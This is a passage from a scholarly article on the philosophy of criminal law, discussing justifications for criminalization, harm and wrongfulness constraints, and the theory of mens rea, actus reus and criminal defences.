Let us take the third objection first. If impersonal values justify having criminal law, we have reason to opt for whichever set of legal rules will realise those values most efficiently. If one set of powers and permissions will achieve more of the value in question at a lower cost, we should—all else being equal—opt for that set. Now compare two sets of rules. One permits state officials and private persons alike to use force to punish criminals. Another withholds the permissions granted to the former from the latter. We have good reason to think that the first set of rules would bring with it significant costs. Private persons are likely to make more mistakes about who committed crimes, and about how much punishment is appropriate for criminality. Different private punishers are unlikely to punish similarly placed offenders in similar amounts. And as their actions are less easily subjected to public scrutiny, private persons are less easily compelled to punish for the right reasons—in order to do justice rather than settle scores, get revenge, or maximise their profit margins (Moore 2009a, 42; Edwards forthcoming). Avoiding these costs is a strong reason to opt for the second set of rules. True, that set prevents proportionate punishment being imposed by our imagined moot court. But it is plausible to think that this benefit is outweighed by the aforementioned costs. If it is, those who appeal to impersonal values to justify criminal law can explain why the moot court is not permitted to force us to give up our money.
According to the second objection, what justifies having criminal law is its role in stabilizing valuable institutions. Notice, however, that if violating the rules of a valuable institution contributes to its destabilization, we will often have a moral duty to conform to the institution’s rules. By preventing these wrongs, and holding wrongdoers responsible, we stabilize the institutions. The contrast between a general justification focused on moral wrongdoing, and one focused on institutional stability, therefore turns out to be a false contrast (Tadros 2016, 135). These observations help make a more general point. We can accept that criminal law is a tool properly used to support financial, educational, familial, military, and political institutions. We can also accept that it is not any old tool—that criminal law is ‘a great moral machine, stamping stigmata on its products, painfully “rubbing in” moral judgments on the people who entered at one end as “suspects” and emerged from the other end as condemned prisoners’ (Feinberg 1987, 155). It is precisely because criminal law is a tool of this special kind—a ‘morally loaded sledgehammer’ (Simester and von Hirsch 2011, 10)—that its general justification is plausibly found in preventing and responding to moral wrongs (cf. Tadros 2016, 68–70).
If this kind of general justification is not too restrictive, is it nonetheless too expansive? This was the first of the three objections raised above. Let us grant that some moral wrongs are not the criminal law’s business. We need not infer that criminal law is unconcerned with moral wrongness. We need only accept that there are facts about criminalization which give law-makers a duty not to criminalize some moral wrongs. There are many such facts, and their force varies depending on the wrong (Simester and von Hirsch 2011, 189–211; Moore 2014). In some cases, criminalizing a wrong will inevitably result in selective enforcement, raising concerns about selection being made on discriminatory grounds. In others, enforcement would necessitate gross invasions of privacy, and require the law to take sides in conflicts better resolved by the parties themselves. There is often value in freely choosing not to act wrongly, and in so choosing for the right reasons, rather than because one was coerced: criminalizing a wrong may result in this value disappearing from the world. It will almost inevitably divert scarce resources from other valuable priorities. And there is often reason to think that criminalization will not result in there being less wrongdoing in the world. Criminal conduct may be driven underground rather than made less common. Institutions of punishment may house unseen abuse and victimization. Ex-offenders may be driven towards crime by their reduced prospects in life. Where reasons like these generate a duty not to criminalize a wrong, the conduct in question is no business of the criminal law. There is nothing here to cast doubt on the thought that criminal law’s general justification consists in preventing, and holding people responsible for, moral wrongs.
4. The Limits of Criminal Law
No-one denies that some things should not be criminalized. What is less clear is how we are to work out what these things are. One approach is to seek constraints on permissible criminalization. Even if the values that justify having criminal law count in favour of criminalization, our reasons to do so may be defeated by reasons that count against. A constraint identifies conditions under which the latter reasons always win. Consider, for example, the wrongfulness constraint:
- (W) It is only permissible to criminalize \(\phi\)ing if \(\phi\)ing is morally wrongful conduct.
Principles like (W) give us a line we can draw without reference to (at least some) morally salient particulars. Conduct that falls outside the line may not be criminalized come what may. Imagine we are considering whether to make it a crime to possess guns. Doing so will prevent a great deal of harmful wrongdoing that cannot be prevented otherwise. This is a powerful moral reason to criminalize. But if (W) is sound, and gun possession is not morally wrongful, that powerful reason is irrelevant to the decision with which we are faced. We are not permitted to criminalize, however much harm criminalization would prevent (Moore 1997, 72–73; Simester and von Hirsch 2011, 22–23; Duff 2014b, 218–222).
Some suspect that all purported constraints on criminalization fail (Duff et al 2014, 44–52; Tadros 2016, 91–107). This is not to say that anything goes. It is rather to say that we cannot use a line like that drawn by (W) to work out what is permissibly criminalized. To trace the limits of the criminal law, we must engage in a more complex normative exercise: we must consider all morally salient particulars of proposed criminal laws—giving those particulars due weight in our deliberations—and thereby determine whether each proposal should be enacted. The limits of the criminal law cannot be traced in advance of this exercise. Instead, they are determined by it.
The constraint to which most attention has been paid is the so-called harm principle. It is nowadays widely recognised that there is no single such principle. Rather, there are many harm principles (Tadros 2011a; Tomlin 2014b; Edwards 2014). One important distinction is between the harmful conduct principle (HCP) and the harm prevention principle (HPP):
- (HCP) It is only permissible to criminalize \(\phi\)ing if \(\phi\)ing is harmful conduct, or conduct that unreasonably risks harm.
- (HPP) It is only permissible to criminalize \(\phi\)ing if criminalizing \(\phi\)ing is necessary to prevent harm, and if the harm done by criminalization is not disproportionate to the harm prevented.
These principles have very different implications. That conduct is harmful, or unreasonably risks harm, does not show that we will prevent a proportionate amount of harm by criminalizing it. Conversely, we may be able to prevent harm only by criminalizing conduct that is harmless, and that does not unreasonably risk harm.
To see the first point, consider the use of drugs. Criminalizing use may turn a drug into forbidden fruit that is more attractive to potential consumers, and place production in the hands of criminal gangs who make consumption ever more harmful. Users may become less willing to seek medical treatment for fear of exposing their criminality, and may end up with criminal records that lead to social exclusion, and damage their employment prospects for years to come (United Nations 2015). Where criminalization does have these effects, the harm it does is out of all proportion to any harm prevented. Even if (HCP) is satisfied, (HPP) is not.
To see the second point, consider the possession of guns. Possessing a gun is not itself harmful. And many possess guns without unreasonably risking harm. If one endorses (HCP), one must either weaken one’s chosen principle or accept that gun possession cannot be criminalized. If one endorses (HPP), things are different. What matters is not the effect of each instance of gun possession, but the effect of criminalizing all of them: if criminalizing possession will prevent harm that would not otherwise be prevented—and do so at a not disproportionate cost—the fact that some owners possess guns safely is beside the point. Whether or not (HCP) is satisfied, (HPP) is.
Constraints like (W), (HCP), and (HPP) require clarification. To apply (W) we need to know what makes something morally wrongful. Plausibly enough, it is morally wrongful to \(\phi\) only if there is decisive reason not to \(\phi\). But while this is necessary, it may not be sufficient. I have decisive reason not to go out in the rain without my umbrella. But it does not seem morally wrongful to do so (Tadros 2016, 11–46). Whatever the correct criterion, we must ask how law-makers are to apply it. Are law-makers to ask whether most members of society believe \(\phi\)ing to be morally wrongful—a matter of conventional morality—or are they to ask whether this is what members would ideally believe—a matter of critical morality (Hart 1963; Devlin 1965)? We must also ask whether just any morally wrongful act will do. Some wrongful acts also violate rights, such that those who commit them wrong others. On one view, it is only when \(\phi\)ing meets this additional test that it is permissible to criminalize \(\phi\)ing (Feinberg 1984; Stewart 2010).
Some crimes are mala in se—they criminalize conduct that is morally wrongful independently of the law. Most crimes are mala prohibita—they criminalize conduct that, if morally wrongful at all, is morally wrongful partly in virtue of the fact that it is unlawful. Is (W) compatible with the existence of mala prohibita? That depends on the extent to which changes in the law can produce changes in morality. The rules of the road are the classic case. Apart from the law, it is morally wrongful to drive dangerously. Such conduct is malum in se. What we should do to conform to this moral norm is not always obvious. To help, the law puts in place rules that tell us which side of the road to drive on, when to stop, and how fast we may go. Imagine we obey these rules. In doing so, we drive more safely than we otherwise would have: we better conform to the moral norm that prohibits dangerous driving. One proposal is that it is morally wrongful to violate legal norms that have this effect: that help us better conform to moral norms that exist independently of the law (Gardner 2011, 19–21). Mala prohibita of this kind would then be compatible with (W). Of course, things are not so straightforward. Even if legal conformity generally improves our moral conformity, there may be exceptional cases in which it does not—in which we can violate the rules of the road without putting anyone in danger, or in which violation helps keep everyone safe. And there may be people for whom even the generalization is not true—whose expertise enables them to systematically violate legal norms without creating risks any greater than those created by the rest of us. Can an explanation be given of why these violations are nonetheless morally wrongful? If not, (W) implies that even morally beneficial mala prohibita—like the rules of the road—must ultimately be removed from the criminal law (Husak 2008, 103–119; Simester and von Hirsch 2011, 24–29; Wellman 2013).
To apply (HCP) and (HPP) we need a conception of harm. Most views are comparative: we are harmed by some event if and only if that event renders us worse off in some way relative to some baseline. One challenge is to identify the relevant baseline. Are we harmed by an event if we are worse than we would have been if things had been different? If so, different how? Are we harmed if we are worse off than we were immediately beforehand? Or should we focus not on the position we were or would have been in, but on the position we should have been in morally speaking (Holtug 2002; Tadros 2016, 187–200)? A second challenge is to determine in what way we must be worse off. The wider our answer to this question, the more likely it is that harm principles collapse into their supposed rivals. Some say we are harmed when our interests are set back (Feinberg 1984, 31–64). But it is plausible to think that we have interests in avoiding disgust, annoyance, and dismay. Many people are disgusted, annoyed, or dismayed by what they take to be morally wrongful. On an interest-based view, they are also harmed. Any harm principle that uses this notion of harm thus threatens to permit criminalization of much conventional immorality (Devlin 1965). A narrower view has it that we are harmed only if our future prospects are reduced, because we are deprived of valuable abilities or opportunities (Raz 1986, 413–414; Gardner 2007, 3–4; Simester and von Hirsch 2011, 36–37). Disgust, annoyance, and offence need not—and often do not—have this effect. So they need not be—and often are not—harmful. But as blinding pain also need not reduce one’s prospects in life, it is arguable that this view avoids collapse only at the cost of underinclusion (Tadros 2016, 179–180).
Whatever view of harm we take, we must also decide whether all harms count for the purposes of a given harm principle. People sometimes harm themselves, they are sometimes harmed by natural events, and harm is sometimes done consensually. Recall that if we endorse (HPP), we must decide whether the harm criminalization prevents is proportionate to the harm it does. Can we include all the aforementioned harms in our calculations? Or must we only include harm done to others without their consent (Mill 1859; Dworkin 1972; Feinberg 1986; Coons and Weber 2013)? Some point out that whatever law-makers’ aims, most criminal laws will prevent some non-consensual harm (Feinberg 1986, 138–142; Tadros 2016, 103). Be that as it may, whether we take into account other harms remains important: where the scales would otherwise point against criminalization, giving weight to a wider range of harms may tip the balance decisively in its favour.
As well as asking how constraints might be clarified, we must ask how they might be defended. One type of defence proceeds from within our theory of ideals. A theory of ideals includes an account of the values that bear upon how we should act, and of the priority relations between those values (Hamlin and Stemplowska 2012). To see how such a theory might generate constraints, consider (W). One argument for that principle is the argument from conviction (Simester and von Hirsch 2011, 19–20):
- To criminally convict \(D\) of \(\phi\)ing is to censure \(D\) for having \(\phi\)ed;
- To censure \(D\) for having \(\phi\)ed is to convey that \(D\)’s \(\phi\)ing was morally wrongful;
- It is morally defamatory to send false messages about the moral status of \(D\)’s conduct;
- It is impermissible to criminalize conduct that is not morally wrongful.
A second argument is the argument from punishment (Husak 2008, 92–103):
- To criminally punish \(D\) is to intentionally harm \(D\), and expose \(D\) to social stigma;
- We have a right not to be intentionally harmed in a way that exposes us to such stigma;
- That right is permissibly infringed only if we are punished for wrongful conduct;
- It is impermissible to criminalize conduct that is not morally wrongful.
One response to these arguments is that criminal law does not always censure or stigmatize. Another is that the arguments rely on priority claims that cannot be sustained. The argument from conviction depends on our accepting that moral defamation cannot be justified. The argument from punishment depends on our accepting that those who do not act wrongly have an absolute right not to be punished. These claims may be too strong. To test the second, think again about possession of guns. Imagine that we criminalize possession, and that we have good reason to think that we can thereby save many lives. \(D\) possesses a gun safely because \(D\) likes how it looks hanging on the wall. We can grant that \(D\) would act wrongly if \(D\)’s conduct risked harm to others, or prevented the state from saving others’ lives. But as \(D\)’s possession is safe, and the state has in fact criminalized possession, neither is the case. Would the state violate \(D\)’s rights if it punished \(D\)? It is plausible to think not. \(D\) could very easily have refrained from possessing the gun. And if the state were to refrain from punishing safe possessors like \(D\), more people would be likely to possess guns in the mistaken belief that this was safe. This would likely result in some lives being lost. The fact that not punishing safe possessors would probably have this effect is a good reason to think that safe possessors lack a valid complaint if they are punished. It is a good reason to think that it sometimes is permissible to punish the morally innocent. If it is, premise (3) of the argument from punishment is false (Tadros 2016, 329–333).
Now consider (HPP). We can imagine a world in which we could flick a switch, sending an electronic signal to \(D\)’s brain, the only effect of which would be that \(D\) would not act wrongly. Whatever one thinks of this means of prevention, it is not the means we utilize when we make use of criminal law. Absent perfect compliance, criminal law prevents wrongs by publicly making accusations, condemning people as wrongdoers, and punishing them for their wrongs. Public accusations often stick even if nothing comes of them. Punishment is harmful by its very nature. The lives of \(D\)’s family and friends are collateral damage as \(D\)’s prospects are reduced. Some claim that we can justify causing such harm—at least when the state does the harming—only if this is a necessary and proportionate means of preventing people being harmed. So it is impermissible to criminalize when this condition is not satisfied. Hence (HPP) (Raz 1986, 418–420; Edwards 2014, 259–262).
One might reply that the harm internal to justified punishment is harm we lack reason not to impose. Leaving this aside, it is far from obvious that harm has lexical priority over other values. The above argument for (HPP) seems to depend on this claim. But there is wrongdoing that is both serious and harmless. Imagine \(D\) violates the bodily integrity or sexual autonomy of an unconscious \(V\), but this is never discovered and has no further effects (Gardner and Shute 2000; Ripstein 2006, 218–229). It is plausible to think that the value of preventing such wrongs, even when this does not prevent harm, is at least sometimes capable of justifying the harm done by criminalization (Tadros 2016, 106–107).
A second defence of constraints proceeds from within non-ideal theory: from our account of what should be done when some people will not act as they should. One might say that all criminal law theory is part of non-ideal theory—that we have reason to have criminal law precisely because people will (otherwise) act wrongly. Be that as it may. As well as fallible agents who (would otherwise) commit crimes, there are fallible agents who make, apply, and enforce criminal laws. Any non-ideal theory must also take account of the errors the latter are disposed to make. Some are errors of application and enforcement—errors made when police officers arrest, prosecutors charge, and courts punish the innocent. More important for present purposes are the errors law-makers are disposed to make when creating crimes. These errors matter here for the following reason. Prescriptive norms are often justified on the grounds that they prevent/mitigate errors that would be made in their absence (Schauer 1991, 135–166). If followed, speed limits prevent some drivers from driving in ways that are impeccable in isolation. But the limits are justified if they prevent/mitigate errors that drivers would make if we did without speed limits, and if preventing/mitigating the errors is worth the cost of preventing some driving that is otherwise impeccable. Let us grant that, when followed, constraints like (W) or (HPP) prevent some law-makers from criminalizing in ways that are impeccable in isolation. The constraints may be justified if they prevent/mitigate errors law-makers would make if they did without them, and if preventing/mitigating the errors is worth the cost of preventing criminalization that is otherwise impeccable.
Many defenders of (HPP) offer defences that proceed in the manner just described. One error is that of underestimating the value in lives very different from our own: of mistaking the virtues required to succeed in those lives for vices, and of concluding that these supposed vices ought to be suppressed (Raz 1986, 401–407; Gardner 2007, 118–120). A second error is that of underestimating the value of toleration. That value includes making space for experiments in living, which both help combat prejudice by exposing people to the unfamiliar, and help people develop deliberative faculties by exposing them to that with which they disagree (Mill 1859; Brink 2013). A third error is that of underestimating the harm one’s policies do to those who live in very different circumstances (Green 2013b, 202). If the main effects of criminalizing drug use are felt in communities the affluent shun, it is not hard to see how law-makers could be blind to the amount of damage criminalization does. Law-makers who make each of these errors will be tempted to create criminal laws that are anything but impeccable—laws designed to suppress activities the value in which has been missed, which do much more harm than their designers anticipated. The case for (HPP) is that it stands in the way of this temptation. Those who follow it must tolerate conduct—however offensive or immoral they deem it to be—unless they can show that criminalization is a necessary and proportionate means of preventing harm.
Harm-based arguments are nowadays ubiquitous when proposed criminal laws are discussed. Some think this shows that (HPP) is no constraint at all (Harcourt 1999). But it is no surprise that those who merely pay lip service to a principle are not constrained by it. The argument of the previous paragraph was an argument that (HPP) should be followed. To follow that principle is to take seriously the need for an empirical showing—grounded in adequate evidence—that a given law is necessary to prevent a proportionate amount of harm. A better objection is that the error-based argument is incomplete. How widespread would error be if law-makers took themselves to be free of (HPP)? When are the benefits of following (HPP)—in errors prevented—worth the costs—in otherwise impeccable criminal laws? Might there be some other rule that brings us those benefits at a lower cost than (HPP)? We need answers to all these questions, and more, to know if an argument from within non-ideal theory can support (HPP) (Tadros 2016, 94–96).
A number of other possible constraints on the criminal law have been proposed (Dan-Cohen 2002, 150–171; Ripstein 2006). As mentioned earlier, some are skeptical of all such principles. To determine the limits of the criminal law, they think, we must refer to a ‘more disorderly set of considerations’, none of which gives us anything as simple as a (set of) constraint(s): the resulting account of criminal law’s limits will be ‘messier’ than its rivals; but this is ‘what the messy worlds in which we live require’ (Duff et al. 2014, 51–52). The correct response to this skepticism remains unclear. One possibility is that a defensible general line can indeed be found. The question is where the line is, and how it is to be defended against objections like those sketched above. A second possibility is that we need the ‘messier’ theory. If so, we must ask what shape that theory ought to take, and how lofty should be the ambitions of those who construct it. We need to know how much order can be imposed, at the theoretical level, on the ‘disorderly set of considerations’ with which we are confronted (for one answer, see Tadros 2016, 159–172). As the criminal law’s scope in many jurisdictions continues to expand at a dizzying pace, these remain the most urgent questions facing today’s philosophers of criminal law.
5. Criminal Responsibility
Imagine that \(D\) takes \(V\)’s property without \(V\)’s consent. Is \(D\) criminally responsible for the taking? Not necessarily. In English law, \(D\) commits the offence of theft only if \(D\) acts dishonestly, and intends for \(V\) to be deprived of her property permanently. Theft is one of many offences commission of which depends on one’s state of mind. Elements of offences that require particular mental states are known as mens rea elements. Other elements are known as actus reus elements.
Some claim that if \(D\) satisfies all elements of an offence—if \(D\) commits the actus reus with mens rea—this suffices to make \(D\) criminally responsible, but not to make \(D\) criminally liable. Responsibility is understood here as answerability (Duff 2007, 19–36). While we are answerable to the courts for committing offences, we may avoid liability by offering satisfactory answers in the form of defences. This account of criminal responsibility—call it the answerability account—relies on a distinction between offence and defence to which we will return. One argument for the answerability account invokes rules of criminal procedure and evidence. To obtain a conviction, the prosecution must prove that \(D\) committed the offence beyond a reasonable doubt. \(D\) can safely remain silent in the absence of such proof. If the prosecution makes its case, \(D\) has strong prudential reasons to prove a defence: without one, \(D\) will be convicted and punished. The best explanation of these rules, so the argument goes, is that offending acts generate a duty to answer that is otherwise absent. This duty explains why, when we have strong reason to believe \(D\) to be an offender, we put \(D\) under extra rational pressure to explain herself in court.
Some think that, on closer inspection, our rules of procedure and evidence fail to support the answerability account, and help to undermine it. Those rules tell prosecutors to consider evidence both that \(D\) committed an offence and that \(D\) lacks a defence. If there is strong evidence that \(D\) killed in self-defence, \(D\) should not be prosecuted. This matters here for the following reason. When prosecutors decide whether to prosecute, they are deciding whether \(D\) should be called to answer for what \(D\) did. The fact that prosecutors should not prosecute if \(D\) clearly killed in self-defence suggests that those who have defences are not answerable in court. It suggests that we owe the criminal courts answers not for acts that are offences but for acts that are crimes—for offending acts which do not satisfy an available defence. Obviously enough, it is for crimes that we are criminally liable. If responsibility is answerability, and we are answerable for crimes, the conditions of criminal responsibility and the conditions of criminal liability are one and the same. The answerability account, as described above, then fails (Duarte d’Almeida 2015, 239–267).
5.1 Mens Rea
On any view, the conditions under which \(D\) commits an offence are conditions of criminal responsibility. What should these conditions be? There has been much discussion of the mens rea principle (MR):
- \(D\) should be criminally responsible for \(\phi\)ing only if \(\phi\)ing is partly constituted by an element of mens rea.
Standard mens rea requirements include intention and recklessness. Paradigmatically, we intend \(X\) if, and only if, \(X\) is one of our reasons for acting: if, and only if, we act in order to bring \(X\) about. We are reckless about \(X\) if, and only if, (i) we are aware there is a risk of \(X\), and (ii) running the risk of which we are aware is unjustified.
Whether criminal responsibility should require mens rea, and what mens rea it should require, both depend on the reasons we have to accept (MR). Perhaps the most familiar defence appeals to the culpability principle (C):
- \(D\) should be criminally liable for \(\phi\)ing only if \(D\) is culpable for having \(\phi\)ed.
Culpability, as that term is used here, is a moral notion. It is synonymous with moral fault or moral blameworthiness. Mens rea is not sufficient for culpability—even intentional killings are sometimes excused. But it may well be necessary—culpability may presuppose at least some element of mens rea (Simester 2013; cf. Gardner 2007, 227–232). If this is so, the debate shifts to whether we should accept (C). One worry about this principle is its generality. The consequences of criminal liability are not always especially burdensome. And the benefits of liability without culpability may be especially significant. To take but one example, think of regulations that govern the activities of corporations, and which protect the health and safety of the public at large. Making it a criminal offence to violate these regulations, and imposing hefty fines, need have none of the destructive effects of imprisoning individuals. Dispensing with culpability requirements may increase the deterrent effects of the law, by making it harder for violators to escape conviction. Whether (C) is sound depends on whether effects like these—which, ex hypothesi, protect the health and safety of many—can justify imposing criminal liability without culpability.
That (C) may admit of exceptions does not, of course, show that (C) is not generally sound. I suggested above that, where (C) does apply, it entails (MR). How much mens rea (C) requires is a further question. Take the offence of causing death by dangerous driving. The actus reus of the crime requires two things: \(D\)’s driving must exhibit deficiencies that we reasonably expect a qualified driver to avoid, and those deficiencies must cause the death of another person. Some think that (C) calls for two mens rea requirements: \(D\) must have been aware of the deficiencies that made her driving dangerous, and she must have been aware of a risk that they would cause death. The idea that each actus reus element should have a corresponding mens rea element is known as the correspondence principle (Ashworth 2008). Whether (C) in fact supports that principle is a matter of debate. It is sometimes the case that the risk of causing some harmful outcome (like death) helps make it the case that an act (like dangerous driving) is wrongful. There is an internal connection, in these cases, between our assessment of the act and the risk of the outcome. Some claim that where this internal connection exists, \(D\)’s awareness that she was engaged in the wrongful act establishes that she is culpable for the harmful outcome. If this is right, \(D\) need not have any mens rea as to that outcome in order to be culpable for it when it occurs: the correspondence principle cannot be derived from (C) (Simester 2005, 44–46; Duff 2005, 143–147).
A second defence of (MR) appeals to the rule of law (RL):
- the law should be such that those to whom it applies can use its norms to guide their conduct.
Conformity to (RL) is a matter of degree. But an especially high degree of conformity is expected of the criminal law. One reason for this is the special powers criminal law confers on \(D\)’s accusers. Another is the damage a guilty verdict does to the life of the accused. The connection between (RL) and (MR) is clearly stated by Gardner:
According to the ideal known as the rule of law, those of us about to commit a criminal wrong should be put on stark notice that that is what we are about to do. The criminal law should not ambush us unexpectedly. Of course, to avoid unexpected ambushes we all need to know what the law requires of us. For that reason, criminal laws should be clear, open, consistent, stable, and prospective. … Even all this, however, is not enough to ensure that those of us about to violate the criminal law are put on stark notice that we are about to violate it. For we may know the law and yet have no grasp that what we are about to do might constitute a violation of it. That is because often we have no idea which actions we are about to perform. I make a light-hearted remark and (surprise!) I offend one of my guests. I turn on my oven and (surprise!) I blow all the fuses. The mens rea principle is the principle according to which such actions – the self-surprising ones – should not be criminal wrongs (Gardner 2005, 69–70).
If \(D\) must be aware of those aspects of her actions that make them of interest to the criminal law, she is less likely to be ambushed by criminal offences that prohibit those actions. In this way, mens rea requirements contribute to personal autonomy by increasing our ability to steer our lives away from criminal conviction and punishment. So (RL) supports (MR). Does it also support the correspondence principle? This is less clear. One view has it that \(D\)’s awareness of the facts that made her driving dangerous disqualifies \(D\) from complaining that she was ambushed by liability for \(V\)’s death (at least as long as said liability was adequately publicized). On another view, \(D\)’s autonomy not only counts in favour of helping \(D\) to anticipate criminal liability, it also counts in favour of helping \(D\) to anticipate its legal consequences, such that \(D\) can decide if the price of those consequences is worth paying (Hart 1968, 47; Ashworth 2008). If it does not occur to \(D\) that \(\phi\)ing might cause death, it also does not occur to \(D\) that \(\phi\)ing might result in her suffering the additional punishment prescribed for causing it. \(D\) is more likely to factor this information into her decision-making if the criminal law insists that \(D\) is aware of the risk—if it insists on correspondence between actus reus and mens rea.
A third argument for (MR) appeals to liberty (Simester and Chan 2011, 393–395). Consider an offence that prohibits damaging other people’s property. If the mens rea requirement is one of intent, \(D\) is free to knowingly take risks with \(V\)’s possessions. If the mens rea requires awareness, \(D\) is free to put \(V\)’s possessions in harm’s way without giving thought to the risks. If there is no mens rea at all, no amount of care will help \(D\) if she causes property to be damaged. These examples help show that mens rea requirements affect the range of options legally available to \(D\). Obviously enough, the degree to which we should care about taking options off the table depends on how much value they have. This makes the liberty-protecting role of mens rea especially important where criminal responsibility extends beyond paradigmatic cases of wrongdoing. Consider the law of complicity. Under what conditions should \(S\) be criminally responsible for participating in wrongs committed by \(P\)? Imagine it is sufficient that \(S\) realises \(P\) might act wrongly. Anyone who sells goods that are liable to misuse is then in danger of being turned into a criminal by their customers. Shopkeepers must run the gauntlet or close their doors. Narrower mens rea requirements enable them to both stay in business and ensure they remain on the right side of the law (Simester 2006, 591–592).
It is worth concluding this section by returning to two questions distinguished at its outset: (i) should criminal responsibility require mens rea? (ii) what mens rea should it require? Question (i) is often discussed under the heading of strict liability. The literature distinguishes between various senses in which liability can be strict (Duff 2005; Gardner 2005, 68–69; Simester 2005, 22–23). Criminal liability for \(\phi\)ing is substantively strict if we can \(\phi\) without being culpable for \(\phi\)ing. It is formally strict if \(\phi\)ing lacks elements of mens rea. This second category can itself be subdivided. Liability is formally strict in the strong sense when there is no mens rea element at all. Liability is formally strict in the weak sense when at least one actus reus element has no corresponding element of mens rea. If (C) is a sound principle, criminal liability should not be substantively strict. If (MR) is sound, there should be no criminal liability that is formally strict in the strong sense. If the correspondence principle is sound, liability that is formally strict in the weak sense also should not exist.
So much for question (i). What about question (ii)? The above discussion assumed that mens rea at the very least requires awareness. But criminal liability sometimes turns not on what \(D\) noticed, but on what \(D\) failed to notice—on circumstances that would have caused a reasonable person to refrain from doing what \(D\) did. It is where such circumstances exist that \(D\)’s actions are negligent. Some writers claim that negligence has no place in criminal law. If (C) is sound, and culpability requires awareness, then criminal liability should require recklessness at the very least. Others take a different view. They claim that when we are unaware of risks because of vices like arrogance or indifference, this makes us culpable for running those risks. So (C) is compatible with at least some instances of negligence liability in criminal law (Hart 1968, 136–157; Simester 2000; Alexander and Ferzan 2009, 69–85; Moore and Hurd 2011).
5.2 Actus Reus
Whether or not mens rea should be necessary for criminal responsibility, it is rarely claimed that it should be sufficient. The widespread belief that we should not countenance thought crimes leads most writers to claim that there should be an actus reus element to each criminal offence. Paradigmatically, this element is satisfied only if \(D\) acts in a way that causes some outcome, such as death, or property damage, or fear of violence. This paradigm does, of course, admit of a number of exceptions. As well as inchoate offences—like attempts or conspiracies—most systems of criminal law include liability for some omissions. Imagine \(D\) sees \(V\) drowning in a shallow pond and chooses to do nothing. There is no prior connection between \(D\) and \(V\). If the pond is in London, \(D\) commits no offence. Move the drama to Paris and we have ourselves a crime. As this example suggests, both academics and legal systems remain divided over the positive obligations that should be imposed by criminal law (Alexander 2002; Ashworth 2015).
Exceptions aside, the building blocks of our paradigm are each open to interpretation. Consider, for instance, the need for causation. Is the conclusion that \(D\) caused \(V\)’s death a matter of physical fact—something that is, in Hume’s well-known phrase, part of the cement of the universe? Or do the rules of causation—at least in criminal law—lie downstream of moral judgments about the fair attribution of responsibility? Does the truth, perhaps, lie somewhere in between? (Hart and Honoré 1959; Moore 2009b; Simester 2017). The criminal liability of many—as well as the punishments they face—turns on the answer we give to such questions.
Academic debate about causation and omissions largely takes our paradigm for granted. Some writers, however, take a more radical view: they favour a paradigm shift in our thinking about criminal responsibility. One group of radicals focuses on outcomes. Imagine \(D\) shoots at \(V\), intending to cause death. In any system of criminal law this is an attempt. The radicals claim that what happens next should make no difference: \(D\) should be convicted of the same crime whether or not \(V\) is killed. Criminal responsibility, in short, should be insensitive to the outcomes of what we do (Ashworth 1993; Alexander and Ferzan 2009, 171–196). Consider again what I earlier called (C):
- \(D\) should be criminally liable for \(\phi\)ing only if \(D\) is culpable for having \(\phi\)ed.
If this principle is sound, we can offer the following argument:
- We are culpable only for what is within our control;
- There are always factors that bear on the outcomes of our actions that we do not control;
- We should not be criminally responsible for outcomes.
This argument relies on the following suppressed premise:
- We only control \(X\) if there is no factor that bears on \(X\) that we do not control.
It is only if (2\('\)) is true that we never control outcomes. Alas, (2\('\)) has unpalatable implications. Uncontrolled factors do not only bear on whether we succeed. They also bear on whether we try, on the choices we make, and on the character traits that influence our choices. (2\('\)) implies that we are never culpable for any of these things—for our successes, our endeavours, our choices or our character. Pursued to its logical conclusion, it implies that we are never culpable for anything (Nagel 1979; Moore 1997, 233–246). If, as most people believe, we sometimes are culpable for what we do, (2\('\)) must be false. We can add that (3) radically understates the conclusion of the argument offered above. When combined with (C), that argument does not imply that we should not be criminally responsible for outcomes. It implies that no one should ever be criminally responsible.
We might try to salvage the argument from (1)–(3) by revising our account of control:
- We control \(X\) if we have a reasonable chance of preventing \(X\) or bringing \(X\) about.
This revision avoids the unpalatable implications of (2\('\)). But it also renders the argument from (1)–(3) invalid. If (2\(''\)) states the correct account of control, we do sometimes have control over outcomes. Imagine \(D\) holds a loaded gun to \(V\)’s head and pulls the trigger. \(D\) has a reasonable chance—indeed, an extremely high chance—of killing \(V\). On this account of control, (1) and (2) do not support (3): they give us no reason to accept that we are never criminally responsible for outcomes (Moore 2009, 24–26).
We have already seen that, for some, we are criminally responsible for committing offences and criminally liable for committing crimes. This distinction relies on a further distinction between offences and defences: crimes are committed by those who satisfy all the elements of an offence, without satisfying all the elements of any available defence.
One account of the offence/defence distinction is procedural. Offence elements must be proved if conviction is to be the legally correct verdict of the court. So if absence of consent is an offence-element—as it is in the offences created, in England and Wales, by the Sexual Offences Act 2003—it must be proved that consent was absent or \(D\) must be acquitted. The same is not true of defence elements, like those that make up the defence of duress. For a conviction to be correctly entered, it need not be proved that \(D\) did not act under duress. It is enough that there is no evidence that \(D\) acted under duress. The same is true where consent is a defence-element—as it is in the offences created, in England and Wales, by the Offences Against the Person Act 1861. If \(D\) punches \(V\) and is charged with assault occasioning actual bodily harm, the court need not be convinced that \(V\) did not consent. If the issue of consent never comes up, a conviction may still be the legally correct verdict of the court. Simply put, that \(D\) satisfied each offence element is something that must be proved. Whether \(D\) satisfied each defence element can remain uncertain. It is in this procedural distinction, on the view under consideration, that the offence/defence distinction consists (Duarte d’Almeida 2015).
This last claim is denied by those who believe that the offence/defence distinction is substantive. These writers accept that offences and defences are governed by different procedural rules. Their claim is that the distinction between offences and defences explains why those rules differ. Perhaps the most well-known version of this view runs as follows. Offence elements are individually necessary, and jointly sufficient, to describe an act that there is general reason not to perform. Defence elements block the transition from the existence of that reason to the conclusion that \(D\) ought to be convicted of a crime. On this view, whether we should think of the absence of consent as an element of the offence of sexual assault depends on whether we think that there is a general reason not to have consensual sex with others. If there is no such reason, the absence of consent is necessary to give us an act we have general reason not to perform. So it is an element of the offence of sexual assault. If, on the other hand, there is a general reason not to have consensual sex, consent is properly thought of as a defence to sexual assault (Campbell 1987; Gardner 2007, 144–149).
In addition to distinguishing between offences and defences, many writers distinguish between types of criminal defence. The most familiar distinction is between justifications and excuses. The most familiar account of the distinction has it that while justified actors deny wrongdoing, excused actors deny either responsibility or culpability (Austin 1956; Fletcher 1978; Greenawalt 1984; Baron 2005). Two questions are worth asking here. Is the familiar distinction worth drawing? If so, is the familiar account of the distinction the right way to draw it?
